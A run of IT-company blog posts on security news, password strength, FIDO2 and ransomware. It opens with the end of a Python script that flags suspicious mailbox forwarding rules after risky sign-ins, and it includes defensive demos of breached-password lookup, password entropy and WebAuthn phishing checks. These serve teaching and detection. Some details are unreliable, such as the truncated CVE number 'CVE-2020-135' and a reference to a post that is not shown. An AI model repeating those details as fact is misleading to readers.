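            findings.append({"user": rule["user"], "rule": rule["name"],
                             "created": rule["created"], "reasons": reasons})
    return findings


def correlate(signins, rules, expected_countries=EXPECTED_COUNTRIES,
              internal_domain=INTERNAL_DOMAIN):
    """Join the two signals: a risky sign-in followed by a risky rule on the
    same account becomes an incident carrying the remediation steps to take."""
    risky_logins = suspicious_signins(signins, expected_countries)
    incidents = []
    for finding in suspicious_rules(rules, internal_domain):
        created = _ts(finding["created"])
        preceding = [s for s in risky_logins
                     if s["user"] == finding["user"] and _ts(s["time"]) <= created]
        if preceding:
            incidents.append({
                "user": finding["user"],
                "rule": finding["rule"],
                "evidence": finding["reasons"] + [
                    f"preceded by sign-in from {s['country']} ({s['ip']}) at {s['time']}"
                    for s in preceding],
                "actions": ["reset_password", "revoke_sessions",
                            f"delete_rule:{finding['rule']}"],
            })
    return incidents


if __name__ == "__main__":
    for incident in correlate(SIGNINS, INBOX_RULES):
        print(incident["user"], "/ rule:", incident["rule"])
        for line in incident["evidence"]:
            print("  -", line)
        print("  actions:", ", ".join(incident["actions"]))
```

The ordering check (rule created at or after the risky sign-in) is what turns two noisy alerts into one high-confidence incident; a forwarding rule on its own may be legitimate, and a foreign sign-in on its own may be a travelling employee.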

If you would like to find out more about Cybersecurity and how Lineal can help protect your business please contact us.


Adobe Lightroom Users Suffer Data Loss

Many Adobe Lightroom users on iOS have suffered a crippling data loss after a faulty routine update.

Users who updated to Adobe Lightroom Mobile 5.4.0 on iPhone or iPad had their photos and software presets deleted unexpectedly.

Adobe, which develops a large suite of creative apps for the media and design-sectors, has apologised and issued an update for the fault, but made clear that the lost data is irretrievable to those without backups.

The software company’s statement clarifies that only a subset of Lightroom users have been affected – specifically those:

  • Using Lightroom Mobile 5.4.0 on an iOS device (iPhone/iPad)
  • Without an Adobe Cloud Subscription, or with cloud sync disabled
  • Without a separate device or cloud backup (such as iCloud) in operation, independent of Lightroom itself.

This includes many free version users who would have trialled Lightroom without a full Adobe Creative Cloud subscription.

Hundreds of unlucky users took to Adobe’s Support Forums, social media and Reddit to complain that years of photos had been lost as part of the routine update. Others flagged that after restoring from a local device backup, the restored data was deleted again once the app was re-opened.

As noted by The Register, Adobe’s problem is especially acute given Lightroom’s specialist popularity among professional photographers, and others who have significant time or money invested in valued images.

Users are advised to update to 5.4.1 to avoid the issue, although this will not restore lost photos. As always: please, please, please maintain an independent backup of all data you can’t afford to lose.


For IT Support and business continuity assistance, please contact our team today.


Lineal on Tech South West Podcast!

Lineal’s Mike Matthews and Huma Mahmood-Khan recently featured on the Tech South West Podcast (‘Tribe Tech’) – to discuss the post-lockdown recovery, women in tech, and Lineal’s new SQLWorks MRP software.

It’s nearly a year since Lineal was shortlisted for Tech Company of the Year, and won a 2019 Tech South West Award (North Devon Cluster). Members of our team were invited to discuss recent developments, including Covid-19 and other issues facing the technical sector, alongside other award-winning tech businesses from across the region.

Listen now for the story behind our response to the C-19 crisis, the importance of more women exploring a career in tech, and the latest developments for our hotly-anticipated new SQLWorks software release.

Tech South West exists to champion the area’s growing number of technology businesses, showcase innovation and support STEM skills across the wider South West region – partnering with a number of more local Tech Business Groups to advocate for the sector.

You can learn more about their mission on their website here: https://www.techsouthwest.co.uk/


For IT expertise and support, please contact our team today.


DNS Vulnerability: Your IT Team to the Rescue

July 14th: as Microsoft flag a ‘Critical’ Level-10 DNS vulnerability on Domain Name System (DNS) servers worldwide, Lineal engineers rush to patch the infrastructure of dozens of organisations overnight.

The Microsoft Security Response Center recently released details of CVE-2020-135, a ‘Critical Remote Code Execution’ weakness deemed ‘wormable’ (potentially spreading between devices automatically) affecting all Windows Server versions.

A grade of 10.0 is the highest possible severity level that can be assigned under the Common Vulnerability Scoring System Calculator. For comparison the WannaCry attack, which temporarily crippled the NHS in 2017, had a CVSS rating of 8.5.

Lineal staff use remote monitoring software to administer large numbers of client servers and devices, monitor hardware health and deploy patches more rapidly – and were quickly on the case overnight to patch the vulnerability as a special emergency.


Within 8 hours we’d patched a large number of DNS servers – applying both an initial fix and further scheduled updates.

DNS is a naming technology which translates the identities of computers, servers and other networked devices into the IP addresses used for connecting on private and public IT networks.


For this reason, DNS servers often have massive reach, and must be carefully protected to mitigate the risk of compromising an organisation’s technology on a huge scale – even across the globe.

Israeli IT security firm Check Point Software Technologies, who discovered the 17-year-old hidden bug and reported it to Microsoft, argue ‘this is not just another vulnerability’ and that it risks handing an attacker ‘complete control of your IT’ if IT admins fail to address the issue urgently.


For IT expertise and support, please contact our team today.


UK Government rules against Huawei 5G

UK mobile networks have been instructed not to buy Huawei 5G equipment for their infrastructure by the Government, and must remove all existing Huawei equipment by 2027.

The landmark ruling overturns last year’s half-way decision, which banned Huawei from the ‘Core’ UK network only. That earlier decision rested on the UK National Cyber Security Centre’s 2019 findings that, with US sanctions affecting Google Android products, any Huawei chip manufacture moved away from (Japanese-owned and UK-based) ARM could ‘increase the risk’ to the UK.

But Government MPs, the US and Australian Governments, and even some China-critical Human Rights Groups, argued the ruling did not go far enough – resulting in today’s announcement of a complete ban.

Huawei itself argues the criticism is a politically-motivated attack by Washington to hit the Chinese economy. The tech company is the World’s biggest provider of this kind of technology, as well as one of China’s most successful exporters.

China itself has undoubtedly faced more scrutiny from the international community in recent months, following news stories about the Chinese Government’s handling of Coronavirus, Hong Kong protests, the detention of Uighur Muslims in ‘reeducation’ camps, and the close connections between Huawei and the Chinese Communist Party.

All four of the UK’s big mobile providers (BT EE, Vodafone, Three and O2) use Huawei equipment in their core networks, albeit to different extents. The decision also affects major broadband infrastructure providers, such as BT Openreach, and related ISPs.

In practice, this means 5G providers will be forced to look at alternatives from either Finnish provider Nokia or Swedish provider Ericsson.


For IT expertise and support, please contact our team today.


New macOS ransomware warning

Cybersecurity experts are warning against a prevalent new strain of macOS ransomware for Apple devices dubbed ‘EvilQuest’ – packaged alongside pirated versions of popular apps.

Like most ransomware, EvilQuest encrypts all the Apple user’s files and demands a $50 ransom for decryption within 72 hours.

While many Mac users believe malware for Apple devices does not exist – this is simply untrue. The newest strain comes after similar infections spreading between Mac users in recent years, including KeRanger and Patcher.

EvilQuest is also a more sophisticated effort than most attempts by cybercriminals: the app is correctly code signed, with a very convincing installer, and even overpowers the Mac versions of common antivirus software such as Norton, Kaspersky, Avast, McAfee and Bullguard.

The trojanised software known to deliver EvilQuest to unsuspecting victims consists of torrent-download versions of popular Apple macOS apps, examples of which include Little Snitch, Ableton Live and Mixed In Key 8 – a popular DJ application.

Among the important steps Mac users should take to reduce the risk of macOS ransomware are:

  • Keep a regular, organised regime of backups, offline and air-gapped from the device itself.
  • Only download Apps from reputable sources.
  • Consider whether utilities like Malwarebytes and RansomWhere are needed as extra precautions.


For IT Support and cybersecurity expertise, please contact our team today.


easyJet Hit by Cyber Attack

Popular short-haul airline easyJet has been hit by a cyber attack, affecting around nine million customers.

In a statement, easyJet says that a “highly sophisticated cyber-attack” discovered in January 2020 compromised email addresses and travel details of roughly nine million travellers. For 2,208 customers, credit card information was also accessed.

No further detail has yet been publicised as to the nature of the breach, although the company stated that it had “closed off unauthorised access”.

The bad news comes at a difficult time for airlines, as air-travel has declined dramatically in the wake of Covid-19 restrictions. When faced with a similar situation in 2018, British Airways received a large financial penalty of £183m from the Information Commissioner’s Office.

The airline is contacting all affected customers, warning them to be extra vigilant towards ‘unsolicited communications’ due to the heightened risk of phishing attempts from criminals masquerading as easyJet, who may have gained access to customers’ personal details.

Under new GDPR guidelines introduced in 2019, it is mandatory that breached organisations report to the UK Information Commissioner’s Office (ICO), who are currently investigating.


For cybersecurity and IT Support expertise, please contact Lineal today.


NCSC Whitelist & Blacklist Terms Replaced

The UK National Cyber Security Centre (NCSC) are officially removing the technical terms ‘Whitelist’ and ‘Blacklist’ from their organisation in an effort to be more inclusive.

The terms ‘Whitelist’ and ‘Blacklist’, which refer to lists of permitted and not-permitted things in the cybersecurity world, will be replaced with the more literal and accurate ‘Allow List’ and ‘Deny List’.

Prolific spam email domains for example are often ‘Blacklisted’ by system administrators – a negative association the NCSC feels should not, even inadvertently, imply a connection to skin colour.

The organisation, a more public extension of GCHQ, acknowledged in a statement on their website that whilst “…it’s not the biggest issue in the world…”, the organisation is acting positively in response to requests from the public, is making an effort to be more inclusive, and that using such terms might otherwise have impaired the recruitment of valued “future colleagues.”

‘Blacklisting’ also has an unfortunate connotation with an illegal practice of barring whistle-blowing employees and trade union members from working across certain sectors, which has a history within the construction industry among others.

Google Chrome, Microsoft Edge and others have made similar terminology decisions – deciding that pejorative references to colour should not be used in cybersecurity terminology.


For IT Support and cybersecurity expertise, please contact Lineal today.


Number of Covid-19 Scams Explodes

The volume of Covid-19 scams and phishing emails has increased dramatically in recent weeks according to cybersecurity authorities.

Email security software and cybersecurity provider Barracuda Networks has reported a 667% increase in phishing emails throughout the pandemic.

Common scams include pretending to represent Government, law enforcement or medical authorities to obtain information or financial payment, blackmailing users with threat of infection, donation requests for fake organisations, and malware distribution – including one new ransomware even dubbed ‘Coronavirus.’

(Image: Barracuda Covid-19 email scams graph, via Barracuda)

In a joint statement published in April, the UK National Cyber Security Centre (NCSC) and US CISA (Dept. of Homeland Security) note the sudden rise in Covid-19 scams, and highlight instances of SMS text-message phishing attempts mimicking UK Government text alerts.

In the example cited, a fake compensation payment is offered to entice the user to hand over details via an imitation UK Government website.

(Image: example of a Covid-19 scam SMS phishing message)

There has also been a growth in online hackers and trolls targeting Zoom and other video conferencing platforms. Users unfamiliar with this kind of software in particular may prove an easy target for cyber criminals.

Phishing scams are part of a larger trend of online Covid-19 themed fraud. In March, the NCSC removed around 500 fake online shops claiming to be selling fraudulent virus-related items over the internet.

Google currently estimate that Gmail filtering is blocking over 100 million phishing emails each day, and that almost 20% of online email scams now refer to Coronavirus (around 18 million) – likely to be the largest phishing ‘theme’ in history.


For cybersecurity expertise and assistance, please contact Lineal today.


Uh Oh, Time to Patch Firefox Again

Mozilla have released an urgent patch to version 74.0 of Firefox, notifying browser users around the world that it’s time to patch Firefox again.

The timing of the new patch, which also affects the ‘Extended Support Release’ (version 68.6) suggests that the latest update fixes a vulnerability which (at worst) may have been live in the browser since July 2019.

Mozilla’s official announcement from 3rd April categorises the impact as ‘Critical’, and states that ‘we are aware of targeted attacks in the wild abusing this flaw’.

The precise details of the security flaw have not yet been published, although we know that the issue is a ‘use-after-free’ bug, in which the browser releases a block of previously occupied memory back to the device but then continues to use it – with online cybersecurity blogs speculating that whatever new contents end up in the relinquished memory may still have some level of access to the browser.

Community-led Mozilla, whose popular Firefox browser is still the world’s second-most popular desktop browser, suffered other critical security flaws as recently as January – when the US Department of Homeland Security took the unusual step of instructing users to urgently update their browsers following the discovery of a vulnerability which granted potential access to the operating system.

Not that Mozilla is unique in such issues: Google also faced embarrassment in recent months after rolling out an experimental change to Chrome which left millions of users unable to load new tabs.

Patch your browser regularly: Firefox users can update to version 74.0.1 as follows:

  • To upgrade on PC, open Firefox and click ‘About’ and select ‘Restart and Update Firefox.’
  • To upgrade on Mac, open Firefox and click ‘Options’, ‘Firefox Updates or Options’, ‘Advanced’, ‘Update to update Firefox.’

Critical Security Flaw Found in Firefox

The US Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency have advised all Mozilla Firefox users to urgently update their browser versions, following discovery of a vulnerability that grants potential access to the operating system.

The unusual warning comes after Mozilla itself admitted being aware of ‘targeted attacks in the wild abusing this flaw.’

Security loopholes in major platforms are usually closed before criminals are able to exploit them en masse, but this latest admission raises the ‘security advisory’ notice to ‘critical’ status.

Users should upgrade their browser to at least version 72.0.1 on PC/Mac – mobile versions are thought to be unaffected.

  • To upgrade on PC, open Firefox and click ‘About’ and select ‘Restart and Update Firefox.’
  • To upgrade on Mac, open Firefox and click ‘Options’, ‘Firefox Updates or Options’, ‘Advanced’, ‘Update to update Firefox.’

Discovered by Chinese security company Qihoo 360 just two days after the release of Firefox’s previous update, the flaw prompted the US Government to ‘encourage users and administrators… to apply the necessary updates.’


For IT Support and cybersecurity expertise, please contact Lineal today.


Google Chrome Adds a Hacked Password Alarm

Google Chrome 79 will contain a Chrome hacked password alarm to notify at-risk users.

‘Password Checker’, which first appeared in October, will regularly compare user passwords saved in-browser against publicly-known data breaches.

The service will feel familiar to those who’ve tried the (often terrifying) but essential https://haveibeenpwned.com/ – which shows visitors where their email addresses have been compromised.

Chrome’s update is being gradually rolled out to new users, and is available within Settings > People > Sync and Google Services > Other Google Services, and is named ‘Warn you if passwords are exposed in a data breach.’

The alert mechanism is just the latest in a series of attempts to push users towards safer browsing: 2019 also saw Google Chrome actively warn users of websites without a valid security certificate, and penalise such websites in Google search rankings.

Chrome 79’s new hacked password alarm mechanism should prompt systematically when account credentials need password updates, and allow users to keep their accounts secure.
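Both the haveibeenpwned.com check mentioned in the Facebook/LinkedIn post above and the breached-password alerts described here depend on comparing a user’s secret against a breach corpus without handing that secret to the service. The Pwned Passwords range API does this with a k-anonymity scheme: the client hashes the password with SHA-1, sends only the first five hex characters, and matches the rest locally against every suffix the server returns. (Chrome’s own checker uses a different privacy-preserving protocol; this example covers the Pwned Passwords style of check only.) The code below is an added example written for this page, not code from HIBP, Google or Keeper: the breach corpus and its counts are constructed, the simulated server is a local function, and all function names are this example’s own.

```python
import hashlib

# Constructed stand-in for the breach corpus behind a range-query service. A real
# service holds only SHA-1 hashes and prevalence counts, never plaintexts; these
# plaintexts and counts are made up purely so the example runs offline.
_CONSTRUCTED_CORPUS = {
    "password": 3730471,
    "123456": 23597311,
    "qwerty": 3912816,
    "letmein": 213812,
    "Summer2020!": 241,
}


def sha1_hex(text: str) -> str:
    """Upper-case hex SHA-1, the form the range API works in.
    sha1("password") = 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8"""
    return hashlib.sha1(text.encode("utf-8")).hexdigest().upper()


def range_lookup(prefix: str) -> str:
    """Simulated server side. Receives only the first five hex characters of the
    client's hash and returns every stored suffix sharing that prefix, one
    'SUFFIX:COUNT' per line. It cannot tell which (if any) suffix the client holds,
    because every password whose hash starts with that prefix is in the reply."""
    if len(prefix) != 5:
        raise ValueError("range query must be exactly five hex characters")
    lines = []
    for plaintext, count in _CONSTRUCTED_CORPUS.items():
        digest = sha1_hex(plaintext)
        if digest.startswith(prefix):
            lines.append(f"{digest[5:]}:{count}")
    return "\n".join(lines)


def breach_count(password: str, fetch=range_lookup) -> int:
    """Client side. Hashes locally, sends the 5-character prefix, then matches the
    remaining 35 characters against the returned suffixes. Returns how many times
    the password appeared in breaches, or 0 if it was never seen."""
    digest = sha1_hex(password)
    prefix, suffix = digest[:5], digest[5:]
    for line in fetch(prefix).splitlines():
        if not line.strip():
            continue
        candidate, count = line.strip().split(":", 1)
        if candidate == suffix:
            return int(count)
    return 0


def sent_to_server(password: str) -> str:
    """Record exactly what leaves the client for a given password. Useful when
    auditing a tool that claims to use this scheme: it should be five hex
    characters and nothing more."""
    seen = []

    def recording_fetch(prefix):
        seen.append(prefix)
        return range_lookup(prefix)

    breach_count(password, fetch=recording_fetch)
    return seen[0]


if __name__ == "__main__":
    for candidate in ("password", "Summer2020!", "correct horse battery staple"):
        print(f"{candidate!r}: sent {sent_to_server(candidate)}, "
              f"seen {breach_count(candidate)} times")
```

Against the real service the `fetch` argument would be an HTTPS GET of the prefix; the client logic is unchanged, which is the point of the design: the secret, and even its full hash, never leave the device.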

 

For IT support and cybersecurity expertise, contact Lineal today.


How secure is your password?

How secure is your password? One of the biggest causes of security breaches is weak passwords: people often choose passwords that are too short or too predictable. Regardless of how tedious it seems, make it a point to update your passwords regularly, never reuse one across services, and use upper and lower case letters along with symbols and numbers.

The key measure of password security is entropy. In computer-science terms this is a measure of how unpredictable a password is, expressed in bits: for a password chosen at random from an alphabet of N characters, entropy is length × log2(N), and an attacker guessing blindly must try, on average, half of the 2^entropy possibilities before hitting the right one. Each extra character multiplies that work by N, so for the same alphabet longer passwords are by definition more secure and harder to crack. The accompanying table shows how shorter or simpler passwords are quicker to crack.

Password strength
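As an added worked example (not part of the original article), the calculation behind the table: brute-force entropy from length and alphabet size, the expected time to exhaust that space at an assumed 10 billion guesses per second (a figure chosen here for illustration, roughly what a GPU rig achieves against a fast hash), and the caveat the table cannot show, which is that a password on an attacker’s wordlist has the entropy of the list, not of its alphabet. The wordlist below is a constructed stand-in for the multi-million-entry lists attackers actually use.

```python
import math
import string

# Character classes; together they cover the 95 printable ASCII characters.
CHARSETS = {
    "lower": string.ascii_lowercase,
    "upper": string.ascii_uppercase,
    "digits": string.digits,
    "symbols": string.punctuation + " ",
}


def alphabet_size(password: str) -> int:
    """Size of the union of every character class the password draws on.
    Characters outside all classes (accented letters, for example) each count
    as a class of size 1, which keeps the estimate conservative."""
    size = 0
    for chars in CHARSETS.values():
        if any(c in chars for c in password):
            size += len(chars)
    extra = {c for c in password if not any(c in chars for chars in CHARSETS.values())}
    return size + len(extra)


def entropy_bits(password: str) -> float:
    """Brute-force entropy: length * log2(alphabet). Assumes every character was
    chosen uniformly at random, which is the best case for the defender."""
    if not password:
        return 0.0
    return len(password) * math.log2(alphabet_size(password))


def seconds_to_crack(bits: float, guesses_per_second: float = 1e10) -> float:
    """Expected time for an offline attack: half the space on average."""
    return (2.0 ** bits) / 2 / guesses_per_second


# Constructed stand-in for a leaked-password list (real ones hold millions).
COMMON_PASSWORDS = ["123456", "password", "qwerty", "letmein",
                    "football", "iloveyou", "admin", "welcome"]


def effective_bits(password: str, wordlist=COMMON_PASSWORDS) -> float:
    """If the password is on the attacker's list, its entropy is log2(list size):
    'password' scores 37.6 bits by alphabet but only 3 bits against this list."""
    if password.lower() in wordlist:
        return math.log2(len(wordlist))
    return entropy_bits(password)


def human(seconds: float) -> str:
    for unit, size in (("years", 365 * 86400), ("days", 86400), ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:.1f} seconds"


if __name__ == "__main__":
    for pw in ["password", "Tr0ub4dor&3", "correct horse battery staple"]:
        bits = entropy_bits(pw)
        print(f"{pw!r}: {bits:.1f} bits by alphabet, {effective_bits(pw):.1f} bits effective, "
              f"~{human(seconds_to_crack(bits))} at 1e10 guesses/s")
```

The point the numbers make: an eight-character lowercase password falls in seconds whatever its characters, a long passphrase survives for geological time, and neither figure matters if the password is one an attacker will try first.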

What should a password look like

Strong, secure passwords have a lot in common: they are usually long, unique and random, and mix lowercase and uppercase letters with numbers and special characters. Creating passwords that combine all of these aspects can sometimes be challenging.

Most insecure passwords are the result of human behaviour. People do a lot of very predictable things and in general find it difficult to be random, especially when they are actively trying to be: putting special characters only at the beginning or end rather than mixing them into the middle, for instance, or using common phrases and keyboard patterns. To aid memory we often draw on memorable pieces of information, but we should always, where possible, avoid clues and references to our personal lives.

Where can I go for advice

There are many articles online to help with what a strong password looks like. At a recent event Lineal ran with the South West Police Regional Cyber Crime Unit, which focused on cyber security, password strength was highlighted as a high risk for many businesses and individuals.

To find out more, or if you require any help with ways to help protect your business, please contact the IT support team at Lineal.


Lineal Hosts SW Police Cybersecurity Workshop

Local businesses recently gathered at Barnstaple Library for a special cybersecurity workshop organised by the South West Police Regional Cyber Crime Unit and Lineal Software Solutions Ltd.

Thirty participants from firms across the South West took part in a series of lego-based group exercises highlighting key concepts in cybersecurity, as they sought to protect a fictional utilities company from attack by common real-world cyber crime.

The winning team defended their company by spending their budget on the correct countermeasures at each stage of the exercise, and strategically limiting the damage from any breaches in security.

The South West Regional Organised Crime Unit (SW ROCU) is one of nine regional units across England and Wales that delivers specialist capabilities to target and disrupt serious and organised crime. Designed to raise awareness of coordinated digital threats, the cybersecurity workshop session is part of a new educational initiative being run by the Police right across the region.

Group exercises were followed by a short Q&A including advice for businesses on related topics including network best-practice, password policy, physical security, and the Government’s new Cyber Essentials certification.

Lineal’s Head of Technical Services, Matt Norris, explained: “We were delighted to be able to organise the Cyber Crime Unit to run this very special workshop for local companies: we see cyber attacks becoming ever more sophisticated, and the SWRCCU takes a really positive and constructive approach to educating business owners about how to protect their organisations and employees.”

“Many businesses struggle to grapple with cybersecurity, but help and expertise is accessible.”

 

You can learn more about the South West Police Regional Cyber Crime Unit and its educational work across the South West online here.

For IT support and cybersecurity expertise, please contact Lineal today.


iPhone 11 Set to Launch

Apple have officially announced their expected launch event for the iPhone 11, for Tuesday 10th September 2019.

The invite, issued ‘By Innovation Only’, doesn’t give much away about what we can expect to see, although Apple devotees have noted the similarity between the glassy colouring of the teased Apple logo and the original Apple eMac’s famous colourful style from the early 2000s.

Rumours circulating online suggest Apple may be planning multiple iPhone 11 models – with square multi-lens camera clusters and glassy coloured casings, photos of the materials for which were leaked online in May.

Remaining releases are likely to be mainly iterative, including iOS 13 for iPhone, iPadOS and even WatchOS 6. MacOS 10.15 Catalina is also expected to be a key part of Apple’s showcase.

The tech giant is likely to see the iPhone 11 announcement as a chance to help reverse hardware sales trends – which Apple now curiously no longer publishes in full, asserting that devices sold is ‘less relevant today than it was in the past’ a likely marker of the iPhone market slowing down as consumers hang on to their devices for a longer replacement cycle.

Apple is also expected to launch its own gaming service, dubbed Apple Arcade, as an online subscription service akin to an iTunes for gaming – just one example of how the company is increasingly re-focusing its efforts on premium service offerings, rather than luxury hardware.

 

For Apple hardware, expertise, accessories and support – please contact our team today.


Are passwords doomed?

Reports of the death of the password may have been greatly exaggerated in the media: from the suggestion that passwords are the ‘weakest link’ in the cybersecurity chain, to the notion that humans are so bad at using them, that it’s time the technology industry saved us from ourselves.

But is it true; are passwords doomed? Enter the FIDO2 Project – a fascinating effort to ‘Move the World Beyond Passwords’ led by the FIDO Alliance industry association and World Wide Web Consortium.

Headlines aside, FIDO2’s aims are ambitious: to replace passwords with a flexible device-based authentication standard in which users log in with an authenticator, whether a hardware security key or a phone or laptop unlocked by biometrics or a PIN.

Each credential is unique to the website it was registered with, the private key is never stored centrally and never transmitted, and the FIDO Alliance argues this naturally scuppers phishing (the signature is bound to the genuine site’s origin), password theft and replay attacks (each login signs a fresh challenge from the server). It also introduces privacy advantages sure to woo even ardent digital-rights activists, such as the inability to track users between sites, because every site sees a different key.

While still technically possible, cheating biometrics requires the kind of preparation not common to everyday opportunistic cyber-criminals.
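To make those three claims concrete, an added example (ours, not the FIDO Alliance’s code) of the checks a site performs on a FIDO2/WebAuthn login: a fresh challenge that can be used once, the origin reported by the browser rather than the page, the hash of the site identifier, and a signature counter. One deliberate simplification is labelled in the code: real authenticators hold an asymmetric key pair per credential and the site stores only the public key, whereas this toy derives a per-site HMAC key so that it runs on the Python standard library alone. The names bank.example, shop.example and bank-example.evil are invented.

```python
import hashlib
import hmac
import json
import secrets


class Authenticator:
    """Toy authenticator. Real FIDO2 authenticators hold an asymmetric key pair per
    credential and the site stores only the public key; this example substitutes a
    per-site HMAC key so it runs on the standard library alone (a simplification,
    not how the standard works). Everything else mirrors the protocol: a fresh
    server challenge, the browser-reported origin, the rpId hash and a counter."""

    def __init__(self):
        self.master = secrets.token_bytes(32)   # never leaves the device
        self.counter = 0

    def _key(self, rp_id, cred_id):
        # Per-site key: one master secret yields unrelated keys for every site
        return hmac.new(self.master, rp_id.encode() + cred_id, hashlib.sha256).digest()

    def make_credential(self, rp_id):
        cred_id = secrets.token_bytes(16)
        return cred_id, self._key(rp_id, cred_id)

    def get_assertion(self, rp_id, cred_id, client_data_json):
        self.counter += 1
        auth_data = hashlib.sha256(rp_id.encode()).digest() + self.counter.to_bytes(4, "big")
        signed = auth_data + hashlib.sha256(client_data_json).digest()
        return auth_data, hmac.new(self._key(rp_id, cred_id), signed, hashlib.sha256).digest()


class RelyingParty:
    def __init__(self, rp_id, origin):
        self.rp_id, self.origin = rp_id, origin
        self.creds = {}        # cred_id -> [key, last counter seen]
        self.pending = set()   # challenges issued but not yet consumed

    def register(self, cred_id, key):
        self.creds[cred_id] = [key, 0]

    def challenge(self):
        c = secrets.token_urlsafe(32)
        self.pending.add(c)
        return c

    def verify(self, cred_id, client_data_json, auth_data, sig):
        cd = json.loads(client_data_json)
        if cd.get("type") != "webauthn.get":
            return False
        if cd.get("origin") != self.origin:          # phishing site: wrong origin
            return False
        if cd.get("challenge") not in self.pending:  # replay: challenge already used
            return False
        if auth_data[:32] != hashlib.sha256(self.rp_id.encode()).digest():
            return False
        if cred_id not in self.creds:
            return False
        key, last = self.creds[cred_id]
        expected = hmac.new(key, auth_data + hashlib.sha256(client_data_json).digest(),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, sig):
            return False
        counter = int.from_bytes(auth_data[32:], "big")
        if counter <= last:                           # cloned authenticator
            return False
        self.creds[cred_id][1] = counter
        self.pending.discard(cd["challenge"])
        return True


def client_data(challenge, origin):
    # What the browser assembles: the browser, not the page, fills in the origin
    return json.dumps({"type": "webauthn.get", "challenge": challenge, "origin": origin}).encode()


def demo():
    auth = Authenticator()
    bank = RelyingParty("bank.example", "https://bank.example")
    cred, key = auth.make_credential(bank.rp_id)
    bank.register(cred, key)

    # Genuine login from the real site
    cdj = client_data(bank.challenge(), "https://bank.example")
    ad, sig = auth.get_assertion(bank.rp_id, cred, cdj)
    genuine = bank.verify(cred, cdj, ad, sig)

    # Replay of the captured assertion: the challenge has been consumed
    replay = bank.verify(cred, cdj, ad, sig)

    # Phishing: the attacker relays the bank's challenge, but the victim's browser
    # reports the attacker's origin in clientData, so the bank rejects it
    cdj2 = client_data(bank.challenge(), "https://bank-example.evil")
    ad2, sig2 = auth.get_assertion(bank.rp_id, cred, cdj2)
    phished = bank.verify(cred, cdj2, ad2, sig2)

    # A second site gets an unrelated credential id and key: no cross-site tracking
    shop = RelyingParty("shop.example", "https://shop.example")
    cred2, key2 = auth.make_credential(shop.rp_id)
    return {"genuine": genuine, "replay": replay, "phished": phished,
            "unlinkable": cred != cred2 and key != key2}


if __name__ == "__main__":
    print(demo())
```

In a real browser the phishing case fails even earlier, because the browser refuses to use a credential whose rpId does not match the page’s origin; the origin check in `verify` is the server-side backstop for the same property. Note what a password cannot offer here: nothing the user types or the site stores is reusable on another site.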

The big players are taking note: Google plans to ‘begin’ retiring passwords for Google services accessed via biometric-enabled smartphones (such as those with fingerprint scanners) and Microsoft is planning similar changes to apps in Windows 10, even talking of a ‘passwordless world’ via Windows Hello that extends facial recognition. Apple have been publicly heading down this road for a while now – with ‘FaceID’ facial recognition introduced for recent generations of iPhone and iPad, as well as Apple Watch device-led unlocking for your Mac.

Apple’s efforts to prove that the iPhone stores only a ‘mathematical representation’ of the user’s face also suggests that they’re preparing to defend a policy of extending FaceID further at the expense of passwords, even in an increasingly privacy-conscious World.

Users may of course find a world without passwords a little disorientating to begin with – although not forever, if the replacement technology proves more convenient.

Password keeper apps (such as the excellent 1Password) have become an interesting half-way house to a more secure password future – where the password manager retains a set of passwords behind a strong keycode, in an encrypted form. The password manager may also perform other useful functions, such as warning the user where passwords overlap, allocating different password access permissions to different people within a business or organisation, or auto-filling in common web browsers.

The adoption of password managers may reflect a coming time where users continue to ‘use’ passwords, but without engaging in the process of recalling or typing the password. It may not be passwords that are doomed, but the user’s traditional interaction with passwords.

Are passwords doomed? A few potential futures emerge: one where passwords exist but are used less directly by users, where passwords are relegated to a secondary security measure of questionable usefulness, or most radically, where passwords are replaced entirely.

 

For cybersecurity and IT expertise, please contact our team today.


Zoom in hot water over Mac webcam exploit

Apple have issued a silent update for video conferencing software Zoom, following discovery of a major webcam security vulnerability affecting Mac users.

Zoom issued an emergency patch for the problem two days ago – in a rapid response Apple was still concerned might not reach enough users.

The controversial web server installation – originally designed to save Mac-based Safari web browser users from additional clicks and make video conferencing easier to use, was shown to create a potentially serious vulnerability whereby Zoom calls could be launched from any website with the camera turned on.

In bizarre scenes, technology journalists researching the problem were even paired up in video conferences with other unknown individuals doing the same.

Believed to put at risk more than 4 million webcams globally, the zero-day exploit was discovered by security researcher Jonathan Leitschuh – who originally gave Zoom 90-days to resolve the issue prior to publication.


Leitschuh has since praised Zoom’s willingness to do a public ‘about face’ with the emergency patch, and Zoom’s CEO taking direct video calls to discuss the problem.

Nevertheless, Apple’s decision to step in to protect Mac users remains an embarrassment for the previously very successful video conferencing solution.

Additional problems include Mac versions of video conferencing software which use Zoom’s underlying services for white-labeled video calling – such as Ringcentral.

Until the patch is applied, the risk can be reduced by stopping Zoom from activating the camera automatically, via Settings > Video > ‘Turn Off My Video When Joining a Meeting.’ This only prevents the camera from switching on when a call is launched; it does not remove the local web server, so the patch (or Apple’s update) is still required.

 

For software expertise and support, please contact Lineal today.


GandCrab ransomware defeated by Bitdefender decryption

Bitdefender have released a free decryption tool rescuing those affected by recent versions of GandCrab ransomware.

The free tool enables stricken users to recover data encrypted by various versions of GandCrab without paying a ransom to cybercriminals.

In a joint announcement with Europol, Romanian Police and other law-enforcement agencies, the cybersecurity provider detailed how a team of experts were recently able to gain access to the GandCrab control server, and access decryption keys for the ransomware that would allow safe recovery of data.

The black-hat developers behind GandCrab have claimed to have extorted more than $2 billion in ransom payments worldwide, and appeared to enjoy mocking the cybersecurity industry’s attempts to bring them to justice.

GandCrab became the latest nasty ransomware threat in January 2018 – following a disturbing trend of businesses and organisations worldwide struck by malicious encryption software.

Bitdefender’s previous attempts to quash the ransomware resulted in new versions being released by the cyber criminals, but the latest recovery of private keys resulted in GandCrab’s developers announcing their ‘retirement’ – allegedly having pocketed more than $150m in personal profit over five major versions of the ransomware.

Bitdefender’s recovery tool and instructions for use is available for download from the Bitdefender Labs here. In order to use the tool successfully, affected users must have a working internet connection and at least one copy of the ‘ransom note’ file present on the affected device.

 

For cybersecurity expertise and support, contact our team today.


Zero-Day Patch Released for Adobe Reader DC

Adobe have released an urgent update for Adobe Reader DC, patching newly discovered security vulnerabilities.

